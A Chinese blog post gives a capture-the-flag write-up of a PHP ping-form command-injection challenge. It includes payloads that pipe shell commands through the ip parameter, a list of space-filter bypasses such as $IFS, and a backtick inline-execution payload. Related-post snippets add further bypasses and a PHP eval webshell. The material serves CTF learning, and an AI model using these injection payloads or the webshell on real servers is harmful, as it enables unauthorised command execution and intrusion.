ping cat.flag.php,[GXYCTF2019]Ping Ping Ping 1

最新推荐文章于 2022-10-28 19:38:55 发布
最新推荐文章于 2022-10-28 19:38:55 发布
阅读量365 收藏
点赞数
文章标签: ping cat.flag.php

进入界面

根据提示进行ping信号

看到网页的内容就想到经典的Linux命令执行,使用命令执行的管道符 "  |  "尝试列出文件

FLAG应该在Flag.php里面

构造playload进行提取

http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat flag.php

提示:“/?ip= fxck your space!”,space暗示我们存在空格过滤,尝试构造语句来绕过空格

$IFS

${IFS}

$IFS$1 // $1改成$加其他数字貌似都行

<

<>

{cat,flag.php} // 用逗号实现了空格功能

%20

%09

出现新的提示“/?ip= 1fxck your symbol!”

说明仍然存在“flag”过滤,联想之前做的BUU题目,提示应该藏在另外一个php文件(index.php)里面,于是利用上面的绕过空格来构造Playload进行查看index.php

http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3|cat${IFS}index.php

经行php代码审计

/?ip=

|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match)){

echo preg_match("/\&|\/|\?|\*|\|\'|\"|\\|\(|\)|\[|\]|\{|\}/", $ip, $match); //preg_math函数过滤掉的字符

die("fxck your symbol!");

} else if(preg_match("/ /", $ip)){ //同上

die("fxck your space!");

} else if(preg_match("/bash/", $ip)){

die("fxck your bash!");

} else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ //同上

die("fxck your flag!");

}

$a = shell_exec("ping -c 4 ".$ip);

echo "

";

print_r($a);

}

?>

内联输出:使用反引号  ``代替 |,经反引号的输出命令转换为输出

构造playload

http://3747c9d4-f879-4d08-8c70-eaf4963f4e8c.node3.buuoj.cn/?ip=110.242.68.3;cat$IFS$9%60ls%60

得到flag

flag = "flag{1fe19100-c980-45f2-9625-262cbd69f6fa}"

Happy Yinger
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]Ping Ping Ping 1
weixin_45674567的博客
07-08 1264
直接尝试:/?ip=127.0.0.1;ls; 看到flag.php,尝试读取:他提示不能有空格,绕过试一试: 尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS等都被过滤了,但{IFS}等都被过滤了,但IFS等都被过滤了,但IFS9还可以使用,于是/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;cat9还可以使用,于是/?ip=127.0.0.1;catIFS$9flag.php; 又说不能出现..
ping 192.168.0.1 详细介绍(图文教程)
10-01
主要介绍了ping 192.168.0.1 详细介绍(图文教程)的相关资料,有时候大家不知道这个Ping 命令到底是什么,这里小编就给大家说说,需要的朋友可以参考下
BUUCTF web小结 1.0
Sk1y的博客
12-21 603
目录 [ACTF2020 新生赛]Include [极客大挑战 2019]Secret File [极客大挑战 2019]LoveSQL [GXYCTF2019]Ping Ping Ping 方法一:绕过正则表达式 方法二:因为过滤了bash,但是没有过滤sh,可用下面的方法,flag在f12中 方法三:内敛执行绕过,将反引号内命令的输出作为输入执行,flag在f12中 总结 [ACTF2020 新生赛]Include 打开题目:注意一下F12里面的跳转,点击tips,跳转, ur
[GXYCTF2019]PING PING PING
車鈊的博客
08-19 533
观察题目: 页面: /?ip= 主网址: http://09703780-fff4-4a8d-be6c-496d349f5c74.node3.buuoj.cn/ 解题: 扫描目录: ?ip=127.0.0.1;ls >> flag.php index.php 尝试读文件: ?ip=127.0.0.1;cat%20flag.php >> /?ip= 1fxck your space! 屏蔽了空格 替换空格: ?ip=127.0.0.1;cat$IFS$1flag.php
BUUCTF 命令执行/文件包含类型部分wp
qq_52988816的博客
11-24 6926
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
[GXYCTF2019]Ping Ping Ping(ping命令执行绕过Waf)
qq_43335965的博客
06-05 92
记一道ping注入的题。过滤了很多字符。 分析 简单的测了一下,很容易就拿到了flag.php和index.php。 但是存在waf无法直接查看。直接?ip=127.0.0.1|cat flag.php提示/?ip= fxck your space!。意思不能存在空格。用$IFS$1可以代替空格。用?ip=127.0.0.1|cat$IFS$1flag.php提示/?ip= fxck your ...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
API的Ping代码.rar
04-04
API的Ping代码.rar
带时间戳ping命令.bat
05-19
带时间戳ping命令,方便用户诊断断网的时间是什么时候,有效协作诊断网络问题。运行后生成的文件位于D盘1213.txt 文件
sqlping代码.rar_sqlping
09-19
sqlping代码
ping cat.flag.php,【学习笔记1】buu [GXYCTF2019]Ping Ping Ping
weixin_28728495的博客
03-26 485
打开网站后,一眼就看到这样的提示,让你传个ip,传一下试试是什么,这里我们就用127.0.0.1试试发现这是这是ping了一下传的ip,那这就是经典的命令执行了,首先执行ls看看都有什么文件有flag.php,index.php两个,很明显flag就在flag.php里,首先所以可以尝试构造怕payload/?ip=127.0.0.1|cat flag.php不行,返回了这个/?ip= fxck ...
每天一道ctf
whisper921的博客
10-28 777
有这样一行代码
WEB 渗透题(一)
0xac001d09
12-06 3779
[ACTF2020 新生赛]Include --文件包含 思路 burp 抓包,发现文件名有点问题。题目和网址的 file 参数,提示这是文件包含的题。 GET /?file=flag.php HTTP/1.1 Host: 9b09eb46-2433-4403-b582-c5ee23d12378.node4.buuoj.cn:81 因此可以构造文件名发包 file=php://filter/read=convert.base64-encode/resource=flag.php GET /?file=ph
BUUCTF-Web题解(一)
flying_bird2019的博客
12-20 1427
ping ping ping 参考其他wp: 链接 执行系统命令 先输入:?ip=127.0.0.1;ls 输出: flag.php index.php ?ip=127.0.0.1;cat flag.php fxck your space! 过滤了空格 空格可以用 ${IFS} $IFS$1 //$加其他数字都可以 < <> {cat,flag.php} %09 代替 ?ip=127.0.0.1;cat,flag.php fxck your flag! flag被过滤 读一下index.p
[buuctf]刷题记录web
qq_61109509的博客
05-12 538
文章目录pingpingping[极客大挑战]http pingpingping 打开后发现要传ip,想到ping命令,先尝试传入127.1.1.1 但是当我们打开flag.php时,发现 /?ip= fxck your space! 说明空格过滤。但是当我们绕过空格时,发现<,%09,$IFS都不起作用 原因是用 $IFS的话,会认为解析没结束,会把后面的也当做参数解析,而 $IFS$9的话,结束了 $IFS 后加上了一个不存在或者说空字符串的变量。所以解析为空,但结束了 $IFS正常执行后面
【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup
algae
08-29 8755
【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有:2、内联执行0x01 解题1、简单变量替换,用a覆盖拼接flag2、变量ab互换传递,绕过字符串匹配,实现拼接3、内联执行4、被过滤的bash,用管道+sh替换 0x00 考点 1、命令绕过空格方法有: $IFS$1、${IFS}$1、 {IFS}、IFS 2、内联执行 内联,就是将反引号内命令的输出作为输入执行 ?ip=127.0.0.1;cat$IFS$9`ls` $IFS在Li
命令执行绕过的练习(一)
qwzf
08-12 1695
0x00 前言 总结完命令执行漏洞的相关绕过知识,做一下CTF题巩固一下,并总结一下做题过程。 0x01 GKCTF-Check_In 题目源码: <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct()
记 [GXYCTF2019]Ping Ping Ping 1
fly夏天的博客
03-24 5244
打开题目,页面显示/?ip= 应该是一个传参的提示。 结合题目的ping。尝试?ip=127.0.0.1 果然是linux的命令执行,尝试执行其他命令 ?ip=127.0.0.1 ;ls 成功执行 目标是flag.php ?ip=127.0.0.1 ;cat flag.php 提示/?ip= fxck your space! 判断目标网站是对空格进行了过滤,我们可以使用一些方...
25分钟了解命令执行漏洞【例题+详细讲解】(一)
贤鱼的博客
09-11 2529
一文初入命令执行漏洞
[GXYCTF2019]Ping Ping Ping
最新发布
09-14
[GXYCTF2019]Ping Ping Ping是一道关于命令注入的题目。在提供的引用中,我们可以看到一个简单的PHP代码段,通过传递ip参数进行ping命令的执行。同时,引用中还给出了一些限制条件,如禁止使用特殊符号、空格、bash命令以及含有"flag"字符等。 根据引用中的代码,我们可以看到如果传递的ip参数满足特定的匹配条件,会输出相应的错误信息并结束程序。因此,我们需要绕过这些匹配条件来执行命令注入。 根据引用中的代码,我们可以看到在ip参数的检查中,会通过正则表达式匹配来判断是否包含特定的符号。因此,我们可以利用一些绕过技巧来绕过这些过滤条件。 最后,引用中给出了一种构造payload的方法。其中,可以通过使用简单变量替换来覆盖拼接flag。具体来说,我们可以将ip参数设置为"127.0.0.1;a=g;cat$IFS$1fla$a.php",这样就可以绕过过滤条件并执行cat命令来获取flag内容。 综上所述,***

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值